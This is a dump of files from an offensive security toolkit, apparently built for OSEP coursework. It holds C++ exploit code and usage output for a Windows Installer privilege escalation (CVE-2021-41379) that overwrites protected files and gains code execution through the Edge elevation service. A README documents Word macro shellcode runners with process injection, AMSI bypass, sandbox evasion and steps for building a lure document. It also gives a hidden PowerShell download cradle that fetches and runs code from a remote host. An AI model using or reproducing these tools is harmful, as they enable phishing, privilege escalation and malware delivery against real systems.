<< std::endl; 90 | std::cout << "[+] The target path is: " << target_path->value() << std::endl; 91 | 92 | std::string adjusted_target("\\??\\"); 93 | adjusted_target.append(target_path->value()); 94 | Exploit exp_obj(msi_path->value(), adjusted_target, i_path->value()); 95 | exp_obj.load_ntdll(); 96 | if (!exp_obj.create_temp_files()) 97 | { 98 | std::cerr << "[-] Creating the temp files failed" << std::endl; 99 | return EXIT_FAILURE; 100 | } 101 | 102 | std::thread doExploit(&Exploit::exploit_thread, &exp_obj); 103 | 104 | std::this_thread::sleep_for(std::chrono::milliseconds(1000)); 105 | if (!install_msi(msi_path->value(), i_path->value())) 106 | { 107 | std::cout << "[-] Install MSI return a bad value" << std::endl; 108 | return EXIT_SUCCESS; 109 | } 110 | doExploit.join(); 111 | std::cout << "[+] Exploit thread joined" << std::endl; 112 | std::cout << "[+] Copy into target!" << std::endl; 113 | 114 | char current_path[MAX_PATH]; 115 | GetModuleFileNameA(GetModuleHandle(NULL), current_path, MAX_PATH); 116 | CopyFileA(copy_path->value().c_str(), target_path->value().c_str(), FALSE); 117 | StartElevationSvc(); 118 | return EXIT_SUCCESS; 119 | } 120 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/D_invoke.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31605.320 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Builder", "Builder\Builder.csproj", "{3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}" 7 | EndProject 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "exe", "exe\exe.csproj", "{4D5A47FE-B129-4E48-987B-1D10E80F08B4}" 9 | EndProject 10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "dll", "dll\dll.csproj", "{567418BD-F614-46A1-AF01-66C28121F538}" 11 | EndProject 12 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "service", "service\service.csproj", "{D614AA1C-E918-43B7-9A76-7EDF6545D530}" 13 | EndProject 14 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "test", "test\test.csproj", "{50AE1F0A-AC50-4A06-98E0-B7091E8341B0}" 15 | EndProject 16 | Global 17 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 18 | Debug|Any CPU = Debug|Any CPU 19 | Debug|x64 = Debug|x64 20 | Release|Any CPU = Release|Any CPU 21 | Release|x64 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 24 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 25 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Debug|Any CPU.Build.0 = Debug|Any CPU 26 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Debug|x64.ActiveCfg = Release|x64 27 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Debug|x64.Build.0 = Release|x64 28 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Release|Any CPU.ActiveCfg = Release|Any CPU 29 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Release|Any CPU.Build.0 = Release|Any CPU 30 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Release|x64.ActiveCfg = Release|x64 31 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Release|x64.Build.0 = Release|x64 32 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 33 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Debug|Any CPU.Build.0 = Debug|Any CPU 34 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Debug|x64.ActiveCfg = Release|x64 35 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Debug|x64.Build.0 = Release|x64 36 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Release|Any CPU.ActiveCfg = Release|Any CPU 37 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Release|Any CPU.Build.0 = Release|Any CPU 38 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Release|x64.ActiveCfg = Release|x64 39 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Release|x64.Build.0 = Release|x64 40 | {567418BD-F614-46A1-AF01-66C28121F538}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 41 | {567418BD-F614-46A1-AF01-66C28121F538}.Debug|Any CPU.Build.0 = Debug|Any CPU 42 | {567418BD-F614-46A1-AF01-66C28121F538}.Debug|x64.ActiveCfg = Release|x64 43 | {567418BD-F614-46A1-AF01-66C28121F538}.Debug|x64.Build.0 = Release|x64 44 | {567418BD-F614-46A1-AF01-66C28121F538}.Release|Any CPU.ActiveCfg = Release|Any CPU 45 | {567418BD-F614-46A1-AF01-66C28121F538}.Release|Any CPU.Build.0 = Release|Any CPU 46 | {567418BD-F614-46A1-AF01-66C28121F538}.Release|x64.ActiveCfg = Release|x64 47 | {567418BD-F614-46A1-AF01-66C28121F538}.Release|x64.Build.0 = Release|x64 48 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 49 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Debug|Any CPU.Build.0 = Debug|Any CPU 50 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Debug|x64.ActiveCfg = Release|x64 51 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Debug|x64.Build.0 = Release|x64 52 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Release|Any CPU.ActiveCfg = Release|Any CPU 53 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Release|Any CPU.Build.0 = Release|Any CPU 54 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Release|x64.ActiveCfg = Release|x64 55 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Release|x64.Build.0 = Release|x64 56 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 57 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Debug|Any CPU.Build.0 = Debug|Any CPU 58 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Debug|x64.ActiveCfg = Debug|Any CPU 59 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Debug|x64.Build.0 = Debug|Any CPU 60 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Release|Any CPU.ActiveCfg = Release|Any CPU 61 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Release|Any CPU.Build.0 = Release|Any CPU 62 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Release|x64.ActiveCfg = Release|x64 63 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Release|x64.Build.0 = Release|x64 64 | EndGlobalSection 65 | GlobalSection(SolutionProperties) = preSolution 66 | HideSolutionNode = FALSE 67 | EndGlobalSection 68 | GlobalSection(ExtensibilityGlobals) = postSolution 69 | SolutionGuid = {137C93F7-A8EB-46F2-B766-75881839821E} 70 | EndGlobalSection 71 | EndGlobal 72 | -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/README.md: -------------------------------------------------------------------------------- 1 | # NOTE: 2 | 3 | This version of shakeitoff has been altered and combined with parts of the original InstallerFileTakeOver (linked below in the original README by the author of shakeitoff) in order to acheive code execution after overwriting the target binary by leveraging the MicrosoftEdgeElevationService. This of course requires that edge is installed on the target machine, and that the service exists. This has been tested on Win10, Win11, Server 2K16, and Server 2K19. Additionally a switch was added to allow the user to specify what file they wish to overwrite the target file with (as opposed to the original POC's which overwrote the target file with the POC). 4 | 5 | # shakeitoff 6 | 7 | A smaller, minimized, and cleaner version of [InstallerFileTakeOver](https://github.com/klinix5/InstallerFileTakeOver) aka the zero-day exploit that is a "variation" of CVE-2021-41379. This version *does not* pop a shell like `InstallerFileTakeOver`. The point of this code was to create a simpler proof of concept that more reliably demonstrates the file creation attack. This proof of concept will create the arbitrary file requested by the user (and copy itself into it to prove writablity). Demonstrating code execution is a trivial excercise left up to the reader. 8 | 9 | To understand how the attack works, please see the [AttackerKB write up](https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis). 10 | 11 | ## Usage 12 | 13 | The tool requires three parameters: 14 | 15 | ``` 16 | C:\Users\albinolobster\source\repos\shakeitoff\x64\Release>.\shakeitoff.exe 17 | option "msi_path" is required 18 | Allowed options: 19 | -h, --help produce help message 20 | -m, --msi_path arg The path to the MSI to install 21 | -i, --install_path arg The path to install to 22 | -p, --target_path arg The file to create 23 | ``` 24 | 25 | 1. -m - the msi to install (full path required). One is provided in this repository (and you should use it since the file paths actually matter). 26 | 2. -i - the install path (full path required). This is where the msi is installed / the exploit goes down. The user must specify this beforehand and it *must* be an empty directory. The tool doesn't clean it up because it makes figuring out the bug easier. There also must be a trailing \ because I'm a monster. 27 | 3. -p - the file to overwrite/create. Full path required. 28 | 29 | 30 | The PoC will just copy itself into the target file. 31 | 32 | 33 | ## Usage Example 34 | 35 | ``` 36 | C:\Users\Public>dir "C:\Program Files\lol" 37 | Volume in drive C has no label. 38 | Volume Serial Number is 5E1E-AC13 39 | 40 | Directory of C:\Program Files 41 | 42 | File Not Found 43 | 44 | C:\Users\Public>.\shakeitoff.exe -m C:\Users\Public\shakeitoff.msi -i C:\Users\Public\lol\ -p "C:\Program Files\lol" 45 | [+] User provided MSI path: C:\Users\Public\shakeitoff.msi 46 | [+] The target path is: C:\Program Files\lol 47 | [+] Create the temp directory structure we'll install into 48 | [+] Grabbing handle to lock C:\Users\Public\lol\shakeitoff\haters.jpg 49 | [+] Grabbing a directory handle of C:\Users\Public\lol\shakeitoff\ 50 | [+] Monitor shakeitoff\shakeitoff for an rbf file 51 | [+] MSI install: ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR=C:\Users\Public\lol\ C:\Users\Public\shakeitoff.msi 52 | [+] Grabbing a handle to inner shakeitoff directory 53 | [+] In callback for oplock one 54 | [+] Opening handle to C:\Users\Public\lol\shakeitoff\8da858.rbf 55 | [+] Creating the callback directory at C:\Users\Public\lol\cb_directory 56 | [+] Grab a handle for the callback directry 57 | [+] Creating a junction from C:\Users\Public\lol\cb_directory to \BaseNamedObjects\Restricted 58 | [+] Inside callback two 59 | [+] Release the hater.jpg handle to unlock 60 | [+] Move the rbf file to C:\Users\Public\lol\weird_directory 61 | [+] Move inner shakeitoff to C:\Users\Public\lol\weird_directory 62 | [+] Move junction at C:\Users\Public\lol\cb_directory to C:\Users\Public\lol\shakeitoff 63 | [+] Configuring symlink from \BaseNamedObjects\Restricted\8da858.rbf to \??\C:\Program Files\lol 64 | [+] symlink created! 65 | [+] MsiInstallProductA return value: 1603 66 | [+] Exploit thread joined 67 | [+] Copy into target! 68 | 69 | C:\Users\Public>dir "C:\Program Files\lol" 70 | Volume in drive C has no label. 71 | Volume Serial Number is 5E1E-AC13 72 | 73 | Directory of C:\Program Files 74 | 75 | 12/02/2021 02:01 PM 368,640 lol 76 | 1 File(s) 368,640 bytes 77 | 0 Dir(s) 86,015,610,880 bytes free 78 | ``` 79 | 80 | ## Credit 81 | 82 | * This code is influenced by the original [exploit](https://github.com/klinix5/InstallerFileTakeOver) published by Abdelhamid Naceri (also the original vulnerability discoverer!). 83 | * The `FileOpLock` code is a (slight modified) version pulled out of [angrypolarbearbug2](https://github.com/jackusm/polarbearrepo/tree/f37184a3fc3ffa5ea76035c9fbdee95a39d7b4c3/angrypolarbearbug2) 84 | * Taylor Swift 85 | -------------------------------------------------------------------------------- /Macros/README.md: -------------------------------------------------------------------------------- 1 | # Macro Shellcode Runners 2 | 3 | ## ToC 4 | 5 | | Application | Notes | 6 | | ----------- | ----- | 7 | | `WordMacroInject.vbs` | Injects shellcode into `explorer.exe` (64-bit Word) or a random 32-bit process, and runs it | 8 | | `WordMacroRunner.vbs` | Loads shellcode into `WINWORD.exe` and runs it | 9 | | `WordMacroRunnerBasic.vbs` | Basic shellcode runner. `WordMacroRunner.vbs` without AMSI bypass or IP check | 10 | | `WordPsCradle.vbs` | Macro with Caesar Cipher encoding that calls a PS download cradle | 11 | | `vbObfuscate.ps1` | PS script to generate Caesar Cipher code for `WordPsCradle.vbs` | 12 | 13 | Both `WordMacroInject.vbs` and `WordMacroRunner.vbs` have: 14 | - Ability to run when executed from both 64-bit & 32-bit Word 15 | - AMSI Check & Bypass 16 | - Simple time-based AV Sandbox detection 17 | 18 | ### Setup/formatting information: 19 | 1. Write "legitimate" contents of the word doc, select all, then navigate to Insert > Quick Parts > AutoTexts and Save Selection to AutoText Gallery 20 | 2. Give it a name, make sure it's saved to that particular document and not a template. Hit ok. Then delete the content from the body of the word doc. 21 | 3. Copy in/write your pretexting content to the body of the word doc. This is the piece that include "enable macros, hit this key combo to execute" etc. 22 | 4. Go to Macro's and click record new macro. Ensure on both screens you select the current document and not a template. Click keyboard and then hit a key combination to map (e.g. Alt + D). Once you hit ok/close, recording will begin. Then go click macros again, view, select the main runner sub, and then click run. This will map that sequence to Alt + D so that when it is entered the runner sub will be executed. 23 | 24 | ## `WordMacroInject.vbs` 25 | This macro performs process injection from both 32-bit and 64-bit Word processes. In 64-bit processes, it injects into `explorer.exe`, but this is easily configurable with a single variable. 26 | 27 | In 32-bit processes, it enumerates running processes and attempts to find another 32-bit process to inject into. These are pretty sparse, but often times processes like `GoogleUpdate.exe`, `OneDrive.exe` are running as 32-bit (at least in the OSEP labs). If it can't find another 32-bit process, it injects into itself (`WINWORD.exe`). 28 | 29 | Uses a `sleep` call to determine if being simulated by AV. The shellcode is not obfuscated at all, that is left up to the reader. Much more can be done to obfuscate the entire script but if I did that here it would be hard to even understand the script, which would defeat its educational purpose. 30 | 31 | ### Notes 32 | 33 | If Word (and thus our Macro) is ran in 32-bit mode, we have to find another 32-bit process to inject into because 32 bit processes cannot easily inject into 64 bit ones. The presumed typical target environment will be running 32 bit word on a 64 bit OS, which renders the injection into explorer impossible. 34 | 35 | Starting in Word 2019 the program is 64 bit by default. This means Word 2019,O365,2021 are all good candidates for Injection because Orgs/individuals would have to go out of their way to have downloaded the 32 bit one. 36 | 37 | There are some more advanced techniques out there that might be able to facilitate 32→64 bit injection (*Heaven's gate*) but no idea if they could be implemented in VBA. 38 | 39 | As always, there are issues concerning stability, and longevity of the process to maintain a reverse shell when we inject into random processes. In reality just using a non-injecting runner and then setting up a C2 to automigrate is probably best practice as they are equipped to do so. 40 | 41 | ## `WordMacroRunner.vbs` 42 | This is a baseline runner that loads the shellcode into `WINWORD.exe` and executes it. Has capabilities to detect AMSI and patch it if found (for both 32-bit and 64 bit) as well as contains shellcode for both 32-bit and 64 bit Word so it can execute after detecting architecture. 43 | 44 | Uses a `sleep` call to determine if being simulated by AV. Also has functionality to make sure the target is in the `192.168.0.0/16` IP range, except you have to uncomment it. 45 | 46 | The shellcode is not obfuscated at all, that is left up to the reader. Much more can be done to obfuscate the entire script but if I did that here it would be hard to even understand the script, which would defeat its educational purpose. 47 | 48 | ## `WordMacroRunnerBasic.vbs` 49 | This is just a basic version of `WordMacroRunner.vbs` without AMSI Bypass or IP Check. 50 | 51 | ## `WordPsCradle.vbs` 52 | Macro with Caesar Cipher encoding that calls a PowerShell download cradle. Use with `vbObfuscate.ps1` to generate and replace obfuscated text in `WordPsCradle.vbs`. This uses WMI dechaining, so **still use x64 shellcode even if you are targeting x86 word**! 53 | 54 | ## `vbObfuscate.ps1` 55 | Powershell script to generate Caesar Cipher code for `WordPsCradle.vbs`. Make sure offsets match for encrypt/decrypt. First output is download cradle, last is app name for app name check before running. 56 | 57 | **This is where you would edit the PS Cradle you would like to run**. The default is: 58 | ```ps1 59 | powershell -exec bypass -nop -w hidden -c iex(new-object net.webclient).downloadstring('http://192.168.49.66/attach.txt') 60 | ``` 61 | --------------------------------------------------------------------------------